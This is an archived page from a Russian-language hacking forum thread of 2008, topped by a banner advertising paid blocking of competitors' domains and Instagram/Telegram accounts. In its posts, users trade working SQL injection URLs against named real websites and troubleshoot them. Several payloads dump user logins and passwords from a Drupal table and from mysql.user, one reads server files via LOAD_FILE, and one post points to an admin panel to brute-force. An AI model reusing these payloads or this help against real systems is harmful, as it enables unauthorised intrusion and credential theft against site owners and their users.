УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 432 из 1393

432

Опции темы

Поиск в этой теме

Опции просмотра

#4311

27.12.2008, 12:12

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

R1dex juggling.tv
принтабельных тож нету? )

Цитата:

http://www.legis.krsn.ru/lawsinfo.php?UID=705+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9

не подбор )

Последний раз редактировалось sabe; 27.12.2008 в 12:16..

#4312

27.12.2008, 12:27

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Цитата:

R1dex juggling.tv
принтабельных тож нету? )

Ага.

http://www.legis.krsn.ru/

Код:

http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

#4313

27.12.2008, 12:39

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

R1dex
угу.. нужно брутить) там еще и sobranie.info домен )
http://www.sobranie.info/adm/

кста стукни

Последний раз редактировалось sabe; 27.12.2008 в 12:42..

#4314

27.12.2008, 14:11

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

подобрал, вроде 14. но ошибка
в чем трабл?

#4315

27.12.2008, 14:25

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Трабла в том, что это 3-я ветка. В ней нету оператора объединения запросов union.

#4316

27.12.2008, 14:54

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

2 R1dex , sabe
http://www.astafiev.ru/topic.php?UID=-119+union+select+111,version()/*
Есть вывод

#4317

27.12.2008, 15:11

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Да, тут есть, но конкретно в том случае - нету.

#4318

27.12.2008, 16:14

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

В соседней темы выкладывалась скуля

Цитата:

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--

Почему при

Цитата:

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+drupalusers--

Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR

#4319

27.12.2008, 16:21

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

Цитата:

Сообщение от Thrasher88

потому что таблица находится в другой базе

Код:

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4,5,6,7,8,9+from+garmenia.drupalusers--

Bonus

доступ к mysql.user:

Код:

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--

чтение фалов:

Код:

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,101,47,121,101,115,111,117,100,111,47,119,119,119,47,99,104,97,110,110,101,108,95,100,101,116,97,105,108,46,112,104,112)),3,4,5,6,7,8,9--

Последний раз редактировалось Iceangel_; 27.12.2008 в 16:40..

#4320

27.12.2008, 16:25

Octave_Parango

Познающий

Регистрация: 06.11.2008

Сообщений: 93

Провел на форуме:
349682

Репутация: 30

Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?

Последний раз редактировалось Octave_Parango; 27.12.2008 в 16:30..

Страница 432 из 1393

432

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход